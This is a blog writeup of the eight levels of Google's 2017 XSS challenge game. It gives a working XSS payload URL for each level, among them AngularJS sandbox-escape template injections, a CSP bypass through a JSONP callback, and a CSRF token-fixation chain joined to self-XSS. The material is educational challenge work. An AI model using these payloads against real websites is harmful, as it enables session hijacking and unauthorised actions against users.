
Google XSS Challenge (2017) writeup

2018-04-20  _Deen

Preface

This is last year's Google XSS challenge. I stumbled on it by chance, and for an XSS novice like me it still taught me quite a bit.

The goal of each level of this xssgame is simply to pop an alert window; there are eight levels in total. Let's go.

Address: http://www.xssgame.com (blocked in mainland China; needs a proxy)

Level 1

url: http://www.xssgame.com/f/m4KKGHi2rVUN/?query=%3Cscript%3Ealert(1)%3C/script%3E

Level 2

url: http://www.xssgame.com/f/WrfpuKFX8GNr/?timer=1

This is a timer; the code is as follows.

[screenshot of the timer code omitted]

The problem is in parseInt(seconds): when we submit seconds='-alert(1)-', the statement that gets executed becomes parseInt(''-alert(1)-''). We can run this line in the browser console. [screenshot omitted]

This is not a problem with the parseInt function itself: the browser first evaluates alert(1), then performs the two subtractions. Replacing parseInt with any other function gives the same result.

Submit: http://www.xssgame.com/f/WrfpuKFX8GNr/?timer='-alert(1)-'

Level 3

url: http://www.xssgame.com/f/u0hrDTsXmyVJ/#1

[screenshots omitted]

Obviously the idea is to close the img tag and trigger onerror, but I hit a snag here. Chrome triggers it, Firefox does not: Firefox URL-encodes the fragment once, so the tag cannot be closed.

Submit: http://www.xssgame.com/f/u0hrDTsXmyVJ/#'onerror=alert(1)>

[screenshot omitted]

Firefox:

[screenshot omitted]

Level 4

url: http://www.xssgame.com/f/__58a1wgqGgI/

view-source:http://www.xssgame.com/f/__58a1wgqGgI/confirm?next=xsss

[screenshot of the page source omitted]

I'm sure everyone has seen this payload; I just didn't think of using it here for a moment. I'm terrible at this.

Submit: http://www.xssgame.com/f/__58a1wgqGgI/confirm?next=javascript:alert(1)

Level 5

url: http://www.xssgame.com/f/JFTG_t7t3N-P/

This is a search box. The page does echo the input, but it HTML-entity-encodes the characters, so encoding tricks do not get around it.

The key point is here.

[screenshot omitted]

AngularJS is a front-end framework that has had template injection vulnerabilities.

Reference articles:
AngularJS sandbox bypass: reflected XSS leaks McDonald's user passwords
Analysis of the AngularJS template injection vulnerability

The framework version here is 1.5.8.

[screenshot omitted]

PoCs for many versions can be found here: http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html

Back to the challenge:

[screenshot omitted]

Submit: http://www.xssgame.com/f/JFTG_t7t3N-P/??utm_term=&utm_campaign={{x%20=%20{%27y%27:%27%27.constructor.prototype};%20x[%27y%27].charAt=[].join;$eval(%27x=alert(1)%27);}}

Submitting the payload from existing writeups online did not get me through; I don't know why I got stuck here.

Level 6

url: http://www.xssgame.com/f/rWKWwJGnAeyi/

Oh no, I can't do this one... I didn't even understand the writeups.

Submit: ?query={{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}

Level 7

url: http://www.xssgame.com/f/wmOM2q5NJnZS/

The keyword is CSP.

[screenshot omitted]

The menu parameter is base64-encoded, and a page is loaded via JSONP.

[screenshot omitted]

By coincidence I had read spleated's article on JSONP exploitation the day before, so I had picked up some knowledge of JSONP.

For a systematic introduction to JSONP, see the article "JSONP security: attack and defence techniques".

The XSS is in menu; following the reference article above:

[screenshot omitted]

We submit <script src="jsonp?callback=alert(1)%3b%2f%2f"></script>, which base64-encodes to PHNjcmlwdCBzcmM9Impzb25wP2NhbGxiYWNrPWFsZXJ0KDEpJTNiJTJmJTJmIj48L3NjcmlwdD4=

Submit: http://www.xssgame.com/f/wmOM2q5NJnZS/?menu=PHNjcmlwdCBzcmM9Impzb25wP2NhbGxiYWNrPWFsZXJ0KDEpJTNiJTJmJTJmIj48L3NjcmlwdD4=

Level 8

url: http://www.xssgame.com/f/d9u16LTxchEi/

The keyword is CSRF.

I was baffled for a long while, so here is someone else's writeup:

The last one mixes the previous challenges into one: the exploit must work for any user, logged in or not, and CSRF, self-XSS and CSP should be exploited in order to win, the introduction says.

It is possible to execute bank transfers logging into an account by username (optional) and sending a transfer with ‘name’ and ‘amount’ values. After the login a ‘username’ cookie is set containing the username entered, name and amount of the transfer are sent as GET parameters, alongside a random 16 bytes CSRF token saved as cookie. CSP is defined like level 7.

Looking into the transfer procedure it is clear the amount field is vulnerable to reflected XSS and the CSP is not defined, however it is just the ‘self-XSS’ part of the challenge and it works only with a ‘csrf_token’ parameter matching the homonym cookie.

During the ‘login’ procedure we notice a request to <challenge url>/set?name=username&value=<username entered>&redirect=index, which would set our ‘username’ cookie and send us back to the homepage.

Using this ‘feature’ we can set an arbitrary cookie with an arbitrary value and redirect the user to an arbitrary page. In our case we can set the ‘csrf_token’ cookie and redirect the user to ‘/transfer’ where the transfer will be executed because the cookie and the ‘csrf_token’ GET parameter match:

<challenge url>/set?name=csrf_token&value=arbitrary&redirect=url_encode(/transfer?name=attacker&amount=3"><script>alert(1)</script>&csrf_token=arbitrary)

(using url_encode for better readability, the argument should be url-encoded in the URL.)

Self-XSS:

http://www.xssgame.com/f/d9u16LTxchEi/transfer?name=deen&amount=3%22%3E%3Cscript%3Ealert(1)%3C/script%3E&csrf_token=IF0BSGV0XH

Using the redirect to perform the CSRF:

[screenshot omitted]

Submit:

http://www.xssgame.com/f/d9u16LTxchEi/set?name=csrf_token&value=IF0BSGV0XH&redirect=transfer?name=deen&amount=3"><script>alert(1)</script>&csrf_token=IF0BSGV0XH

This needs to be URL-encoded:

http://www.xssgame.com/f/d9u16LTxchEi/set?name=csrf_token&value=IF0BSGV0XH&redirect=transfer%3Fname%3Ddeen%26amount%3D3%22%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E%26csrf_token%3DIF0BSGV0XH
